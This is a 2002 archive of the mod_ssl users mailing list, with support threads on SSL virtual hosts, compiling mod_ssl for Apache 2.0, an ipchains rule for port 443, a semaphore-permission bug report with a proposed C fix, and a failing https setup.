Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 22:11:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26583; Fri, 17 May 2002 22:10:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx1.mx.l9.com id WAA26409; Fri, 17 May 2002 22:09:30 +0200 (MET DST)
Received: from abacos2000 (abacos-2000.l9.com [64.30.18.41])
	by mx1.mx.l9.com (8.9.3/8.9.3) with ESMTP id QAA20795
	for ; Fri, 17 May 2002 16:09:18 -0400
From: "Jason Lawrence" 
To: 
Subject: Apache 1.3.20 and ModSSL
Date: Fri, 17 May 2002 16:09:18 -0400
Organization: Level 9, Inc.
Message-ID: <000801c1fdde$ba2f3eb0$29121e40@dom.l9.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3311
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason Lawrence" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am trying to use two the Apache NameVirtualHost option with two sites
using different certificate files.

The two virtual hosts work however only the cert for the first specified
virtual host is recognized.  Is there anyway that you can get two
certificates working in Apache for the same IP address????

Jason Lawrence

 






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 22:12:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26703; Fri, 17 May 2002 22:11:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA26693; Fri, 17 May 2002 22:10:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 938D24CE697; Fri, 17 May 2002 22:10:58 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4HK9ZM40614; Fri, 17 May 2002 22:09:35 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from eccles.ee.ryerson.ca id VAA23807; Fri, 17 May 2002 21:29:50 +0200 (MET DST)
Received: from radon.ee.ryerson.ca (radon.ee.ryerson.ca [172.16.1.238])
	by eccles.ee.ryerson.ca (8.11.1/8.11.1) with ESMTP id g4HJTkV09901
	for ; Fri, 17 May 2002 15:29:46 -0400
Received: (from elf@localhost)
	by radon.ee.ryerson.ca (8.8.8+Sun/8.8.8) id PAA01368;
	Fri, 17 May 2002 15:27:17 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15589.22933.838282.994799@radon.ee.ryerson.ca>
Date: Fri, 17 May 2002 15:27:17 -0400
From: luis fernandes 
To: modssl-users@modssl.org
Subject: modssl and Apache 2.0.36
X-Mailer: VM 6.97 under Emacs 21.0.106.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: luis fernandes 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Can modssl be compiled with Apache 2.0.36 on "Slackware 2.4.18 #14
SMP i586" (2 processor).


The following configure line:

./configure --with-apache=../httpd-2.0.36 --with-ssl=../openssl-0.9.6c --prefix=/var/apache/apache2.0

fails with the error:

Configuring mod_ssl/2.8.8 for Apache/1.3.24
./configure:Error: Cannot find Apache 1.3 source tree under ../httpd-2.0.36
./configure:Hint:  Please specify location via --with-apache=DIR
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 22:42:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28920; Fri, 17 May 2002 22:41:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from barney.usu.edu id WAA28859; Fri, 17 May 2002 22:40:22 +0200 (MET DST)
Received: from RM426 ("port 3892"@rm426.cs.usu.edu [129.123.109.181])
 by cc.usu.edu (PMDF V5.2-32 #39375)
 with SMTP id <01KHTWIABZCOA4LCVW@cc.usu.edu> for modssl-users@modssl.org; Fri,
 17 May 2002 09:59:55 MDT
Date: Fri, 17 May 2002 09:56:56 -0600
From: Alex Earl 
Subject: Re: Runs on local...but can't see it anywhere else...STILL
To: modssl-users@modssl.org
Message-id: <001a01c1fdbb$78837f80$b56d7b81@RM426>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-type: text/plain;	charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-Priority: 3
X-MSMail-priority: Normal
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Earl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It has a static IP. I can access non-ssl stuff just fine. Check out
http://eagle.cs.usu.edu

When I try it with https://eagle.cs.usu.edu though it doesn't work form a
remote machine...only the local maching.



----- Original Message -----
From: "R. DuFresne" 
To: 
Sent: Friday, May 17, 2002 9:51 AM
Subject: Re: Runs on local...but can't see it anywhere else...STILL


>
>
> first, have you registered a domain?  does this server have a static IP
> address that reflects to this domain?  Or is this a machine on the campus
> backbone or student residential systems under the edu domain you are
> posting from?
>
> Thanks,
>
> Ron Dufresne
>
> On Fri, 17 May 2002, Alex Earl wrote:
>
> > I went in and changed the ipchains to allow https, but it still will not
> > connect from a remote location. Someone mentioned setting up DNS for my
> > domain. I was wondering what you meant. Again, I appreciate all your
help
> > for a new guy!
> >
> > Alex Earl
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
>
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
>
> testing, only testing, and damn good at it too!
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 22:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA29765; Fri, 17 May 2002 22:53:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server.cartmanager.net id WAA29727; Fri, 17 May 2002 22:52:39 +0200 (MET DST)
Received: from Jason (dhcp120.cartmanager.net [207.173.85.120])
	by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g4HKhYk00618
	for ; Fri, 17 May 2002 14:43:34 -0600
Message-ID: <018f01c1fde4$c102edd0$7855adcf@Jason>
From: "Jason" 
To: 
References:  <001a01c1fdbb$78837f80$b56d7b81@RM426>
Subject: Re: Runs on local...but can't see it anywhere else...STILL
Date: Fri, 17 May 2002 14:52:23 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You probably need to add port 443 into your ipchains file

eg /etc/sysconfig/ipchains

add
-A input -s 0/0 -d 0/0 443 -p tcp -y -j ACCEPT

Or you may have some configuration program that will do this for you.... I do ipchians by hand.

----- Original Message ----- 
From: "Alex Earl" 
To: 
Sent: Friday, May 17, 2002 9:56 AM
Subject: Re: Runs on local...but can't see it anywhere else...STILL


> It has a static IP. I can access non-ssl stuff just fine. Check out
> http://eagle.cs.usu.edu
> 
> When I try it with https://eagle.cs.usu.edu though it doesn't work form a
> remote machine...only the local maching.
> 
> 
> 
> ----- Original Message -----
> From: "R. DuFresne" 
> To: 
> Sent: Friday, May 17, 2002 9:51 AM
> Subject: Re: Runs on local...but can't see it anywhere else...STILL
> 
> 
> >
> >
> > first, have you registered a domain?  does this server have a static IP
> > address that reflects to this domain?  Or is this a machine on the campus
> > backbone or student residential systems under the edu domain you are
> > posting from?
> >
> > Thanks,
> >
> > Ron Dufresne
> >
> > On Fri, 17 May 2002, Alex Earl wrote:
> >
> > > I went in and changed the ipchains to allow https, but it still will not
> > > connect from a remote location. Someone mentioned setting up DNS for my
> > > domain. I was wondering what you meant. Again, I appreciate all your
> help
> > > for a new guy!
> > >
> > > Alex Earl
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> > --
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >         admin & senior security consultant:  sysinfo.com
> >                         http://sysinfo.com
> >
> > "Cutting the space budget really restores my faith in humanity.  It
> > eliminates dreams, goals, and ideals and lets us get straight to the
> > business of hate, debauchery, and self-annihilation."
> >                 -- Johnny Hart
> >
> > testing, only testing, and damn good at it too!
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 23:01:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA00297; Fri, 17 May 2002 23:00:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iparho.stat.purdue.edu id WAA00208; Fri, 17 May 2002 22:59:57 +0200 (MET DST)
Received: from stat.purdue.edu (localhost [127.0.0.1])
	by iparho.stat.purdue.edu (8.9.3/8.9.3) with ESMTP id PAA05032;
	Fri, 17 May 2002 15:59:55 -0500
Message-ID: <3CE56F4B.98F79062@stat.purdue.edu>
Date: Fri, 17 May 2002 15:59:55 -0500
From: Leslie Arvin 
Organization: Purdue University
X-Mailer: Mozilla 4.76 [en] (X11; U; AIX 4.3)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: acearl@cc.usu.edu
Subject: Re: Runs on local...but can't see it anywhere else...STILL
References:  <001a01c1fdbb$78837f80$b56d7b81@RM426>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leslie Arvin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I was able to access your site using SSL from
iparho.stat.purdue.edu in Netscape 4.76 on Unix AIX
just now with no problems.

-- Leslie Arvin
   arvin@stat.purdue.edu
   Webmaster
   Purdue Statistics Dept.

Alex Earl wrote:
> 
> It has a static IP. I can access non-ssl stuff just fine. Check out
> http://eagle.cs.usu.edu
> 
> When I try it with https://eagle.cs.usu.edu though it doesn't work form a
> remote machine...only the local maching.
> 
> ----- Original Message -----
> From: "R. DuFresne" 
> To: 
> Sent: Friday, May 17, 2002 9:51 AM
> Subject: Re: Runs on local...but can't see it anywhere else...STILL
> 
> >
> >
> > first, have you registered a domain?  does this server have a static IP
> > address that reflects to this domain?  Or is this a machine on the campus
> > backbone or student residential systems under the edu domain you are
> > posting from?
> >
> > Thanks,
> >
> > Ron Dufresne
> >
> > On Fri, 17 May 2002, Alex Earl wrote:
> >
> > > I went in and changed the ipchains to allow https, but it still will not
> > > connect from a remote location. Someone mentioned setting up DNS for my
> > > domain. I was wondering what you meant. Again, I appreciate all your
> help
> > > for a new guy!
> > >
> > > Alex Earl
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> > --
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >         admin & senior security consultant:  sysinfo.com
> >                         http://sysinfo.com
> >
> > "Cutting the space budget really restores my faith in humanity.  It
> > eliminates dreams, goals, and ideals and lets us get straight to the
> > business of hate, debauchery, and self-annihilation."
> >                 -- Johnny Hart
> >
> > testing, only testing, and damn good at it too!
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 18 00:03:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA04343; Sat, 18 May 2002 00:02:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from opie.usu.edu id AAA04288; Sat, 18 May 2002 00:01:42 +0200 (MET DST)
Received: from RM426 ("port 2772"@rm426.cs.usu.edu [129.123.109.181])
 by cc.usu.edu (PMDF V5.2-32 #30472)
 with SMTP id <01KHU94LGJVGA243X5@cc.usu.edu> for modssl-users@modssl.org; Fri,
 17 May 2002 16:01:30 MDT
Date: Fri, 17 May 2002 15:58:31 -0600
From: Alex Earl 
Subject: Re: Runs on local...but can't see it anywhere else...STILL
To: modssl-users@modssl.org
Message-id: <006401c1fded$fb8ad220$b56d7b81@RM426>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-type: text/plain;	charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-Priority: 3
X-MSMail-priority: Normal
References: 
 <001a01c1fdbb$78837f80$b56d7b81@RM426> <3CE56F4B.98F79062@stat.purdue.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Earl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks! I got it working a little while ago.

Alex


----- Original Message -----
From: "Leslie Arvin" 
To: 
Cc: 
Sent: Friday, May 17, 2002 2:59 PM
Subject: Re: Runs on local...but can't see it anywhere else...STILL


> I was able to access your site using SSL from
> iparho.stat.purdue.edu in Netscape 4.76 on Unix AIX
> just now with no problems.
>
> -- Leslie Arvin
>    arvin@stat.purdue.edu
>    Webmaster
>    Purdue Statistics Dept.
>
> Alex Earl wrote:
> >
> > It has a static IP. I can access non-ssl stuff just fine. Check out
> > http://eagle.cs.usu.edu
> >
> > When I try it with https://eagle.cs.usu.edu though it doesn't work form
a
> > remote machine...only the local maching.
> >
> > ----- Original Message -----
> > From: "R. DuFresne" 
> > To: 
> > Sent: Friday, May 17, 2002 9:51 AM
> > Subject: Re: Runs on local...but can't see it anywhere else...STILL
> >
> > >
> > >
> > > first, have you registered a domain?  does this server have a static
IP
> > > address that reflects to this domain?  Or is this a machine on the
campus
> > > backbone or student residential systems under the edu domain you are
> > > posting from?
> > >
> > > Thanks,
> > >
> > > Ron Dufresne
> > >
> > > On Fri, 17 May 2002, Alex Earl wrote:
> > >
> > > > I went in and changed the ipchains to allow https, but it still will
not
> > > > connect from a remote location. Someone mentioned setting up DNS for
my
> > > > domain. I was wondering what you meant. Again, I appreciate all your
> > help
> > > > for a new guy!
> > > >
> > > > Alex Earl
> > > >
> > > >
______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > > > User Support Mailing List
modssl-users@modssl.org
> > > > Automated List Manager
majordomo@modssl.org
> > > >
> > >
> > > --
> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >         admin & senior security consultant:  sysinfo.com
> > >                         http://sysinfo.com
> > >
> > > "Cutting the space budget really restores my faith in humanity.  It
> > > eliminates dreams, goals, and ideals and lets us get straight to the
> > > business of hate, debauchery, and self-annihilation."
> > >                 -- Johnny Hart
> > >
> > > testing, only testing, and damn good at it too!
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 18 09:14:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA06445; Sat, 18 May 2002 09:13:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA06420; Sat, 18 May 2002 09:12:32 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B8CF14CE739; Sat, 18 May 2002 09:12:31 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4I7B9K11629; Sat, 18 May 2002 09:11:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from saintmary.uolinc.com id AAA06154; Sat, 18 May 2002 00:13:18 +0200 (MET DST)
Received: from sahure.intranet (sahure.intranet [192.168.207.49])
	by saintmary.uolinc.com (8.11.6/8.11.1) with ESMTP id g4HMGaH28467
	for ; Fri, 17 May 2002 19:16:36 -0300
Received: by sahure.intranet with Internet Mail Service (5.5.2653.19)
	id ; Fri, 17 May 2002 19:07:46 -0300
Message-ID: <40665E0BC7EE054A94F3060F4C107A4C1C847D@siamun.intranet>
From: Eider Silva de Oliveira 
To: "'modssl-users@modssl.org'" 
Cc: l-adm-engenharia 
Subject: Bug in semaphore permission
Date: Fri, 17 May 2002 19:07:29 -0300
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C1FDEF.3C5159E0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eider Silva de Oliveira 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C1FDEF.3C5159E0
Content-Type: text/plain;
	charset="iso-8859-1"

Hi folks,

   I've been a probleme with Apache 2.0.36 + mod_ssl 2.8.8, and I think this
can be a bug.

   In proc_mutex.c line 219, function proc_mutex_sysv_create:

      new_mutex->interproc->filedes = semget(IPC_PRIVATE, 1, IPC_CREAT |
0600);

   This code is executed as root, during the module init stage, but the
semaphore will be used as a common user (nobody), and there is no change of
its ownership.

   I'm trying to fix this, but I don't know how to get the config user id in
the module to call semctl:

    if (!geteuid()) {
        buf.sem_perm.uid = unixd_config.user_id;
        buf.sem_perm.gid = unixd_config.group_id;
        buf.sem_perm.mode = 0600;
        ick.buf = &buf;
        if (semctl(new_mutex->interproc->filedes, 0, IPC_SET, ick) < 0) {
			rv = errno;
			proc_mutex_sysv_cleanup(new_mutex);
			return rv;
        }
    }

    Does anyone have a clue?

[]s

_________________________________________
Eider Oliveira
ICQ#:116119057

Engenharia de Sistemas - Uol Inc
eoliveira@uolinc.com
_________________________________________

------_=_NextPart_001_01C1FDEF.3C5159E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Bug in semaphore permission




Hi folks,




   I've been a probleme with Apache 2.0.36 =
+ mod_ssl 2.8.8, and I think this can be a bug.




   In proc_mutex.c line 219, function =
proc_mutex_sysv_create:




      =
new_mutex->interproc->filedes =3D semget(IPC_PRIVATE, 1, =
IPC_CREAT | 0600);




   This code is executed as root, during =
the module init stage, but the semaphore will be used as a common user =
(nobody), and there is no change of its ownership.



   I'm trying to fix this, but I don't know =
how to get the config user id in the module to call semctl:




    if (!geteuid()) {

        =
buf.sem_perm.uid =3D unixd_config.user_id;

        =
buf.sem_perm.gid =3D unixd_config.group_id;

        =
buf.sem_perm.mode =3D 0600;

        ick.buf =
=3D &buf;

        if =
(semctl(new_mutex->interproc->filedes, 0, IPC_SET, ick) < 0) =
{

        =
        =
        rv =3D =
errno;

        =
        =
        proc_mutex_sysv_cleanup(new_mutex);

        =
        =
        return =
rv;

        }

    }




    Does anyone have a clue?




[]s




_________________________________________

Eider Oliveira

ICQ#:116119057




Engenharia de Sistemas - Uol Inc

eoliveira@uolinc.com

_________________________________________





------_=_NextPart_001_01C1FDEF.3C5159E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 18 13:17:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20127; Sat, 18 May 2002 13:16:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id NAA20089; Sat, 18 May 2002 13:15:52 +0200 (MET DST)
Received: (qmail 28187 invoked by uid 1001); 18 May 2002 12:13:15 -0000
Received: from unknown (HELO gateway) (192.168.3.115)
  by 192.168.3.7 with SMTP; 18 May 2002 12:13:15 -0000
Date: Sat, 18 May 2002 12:15:41 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.20 and ModSSL
In-Reply-To: <000801c1fdde$ba2f3eb0$29121e40@dom.l9.com>
References: <000801c1fdde$ba2f3eb0$29121e40@dom.l9.com>
Message-Id: <20020518121503.6C5C.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Not at present. You need a unique IP address for each SSL site.

I believe discussions/proposals have been had/proposed, but nothing yet
has been done about them.

Regards,

L

On Fri, 17 May 2002 16:09:18 -0400
"Jason Lawrence"  wrote:

> I am trying to use two the Apache NameVirtualHost option with two sites
> using different certificate files.
> 
> The two virtual hosts work however only the cert for the first specified
> virtual host is recognized.  Is there anyway that you can get two
> certificates working in Apache for the same IP address????
> 
> Jason Lawrence
> 
>  
> 
> 
> 
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 18 13:43:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA21371; Sat, 18 May 2002 13:42:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA21341; Sat, 18 May 2002 13:41:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 53DDC4CE698; Sat, 18 May 2002 13:41:35 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4IBV3k31459; Sat, 18 May 2002 13:31:03 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id KAA11184; Sat, 18 May 2002 10:48:04 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sat, 18 May 2002 01:47:04 -0700
Received: from 202.228.202.14 by lw12fd.law12.hotmail.msn.com with HTTP;
	Sat, 18 May 2002 08:47:03 GMT
X-Originating-IP: [202.228.202.14]
From: "Nay Mooly" 
To: modssl-users@modssl.org
Subject: https in Apache1.3
Date: Sat, 18 May 2002 17:47:03 +0900
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 May 2002 08:47:04.0109 (UTC) FILETIME=[956C55D0:01C1FE48]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nay Mooly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Hello

I installed  Apache1.3.20 and mod_ssl-2.8.4-1.3.20 and openssl-0.9.6c.
I try http://IP address ,and success.
But I try https://IP address ,I get error message (cannot indicate).
I use

#cd openssl-0.9.6c
#./config -fPIC
#make

#cd mod_ssl-2.8.4-1.3.20
#./configure --with-apache=../apache1.3.20 --with-ssl=../openssl-0.9.6c \
--enable-shared=ssl

#cd apache_1.3.20
#make
#make certificate TYPE=custom

----input data---------

#make install
#/usr/local/apache/bin/apachectl start
#/usr/local/apache/bin/apachectl startssl

-----enter pass phrase-----------

     (httpd started)

Then http:// is OK ,but retry https://  failed.


I will thank you very much,if you give me some solutions.

Thanks

_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 19 22:12:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA13462; Sun, 19 May 2002 22:11:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from pv182069.reshsg.uci.edu id WAA13408; Sun, 19 May 2002 22:10:39 +0200 (MET DST)
Received: (qmail 23908 invoked from network); 19 May 2002 20:10:34 -0000
Received: from dhcp-132.reshsg.uci.edu (HELO ics.uci.edu) (192.168.1.132)
  by pv182069.reshsg.uci.edu with SMTP; 19 May 2002 20:10:34 -0000
Message-ID: <3CE806BA.4090701@ics.uci.edu>
Date: Sun, 19 May 2002 13:10:34 -0700
From: Joachim Feise 
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020510
X-Accept-Language: en,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: modssl and Apache 2.0.36
References: <15589.22933.838282.994799@radon.ee.ryerson.ca>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joachim Feise 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

luis fernandes wrote:

>Can modssl be compiled with Apache 2.0.36 on "Slackware 2.4.18 #14
>SMP i586" (2 processor).
>

It already is included in Apache 2.0. See 
http://httpd.apache.org/docs-2.0/new_features_2_0.html

>The following configure line:
>
>./configure --with-apache=../httpd-2.0.36 --with-ssl=../openssl-0.9.6c --prefix=/var/apache/apache2.0
>
>fails with the error:
>
>Configuring mod_ssl/2.8.8 for Apache/1.3.24
>./configure:Error: Cannot find Apache 1.3 source tree under ../httpd-2.0.36
>./configure:Hint:  Please specify location via --with-apache=DIR
>

As it says: it tries to configure mod_ssl for Apache 1.3.24, not for 2.0.
Read the 2.0 docs.

-Joe


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 20 02:39:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA29717; Mon, 20 May 2002 02:38:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id CAA29671; Mon, 20 May 2002 02:37:47 +0200 (MET DST)
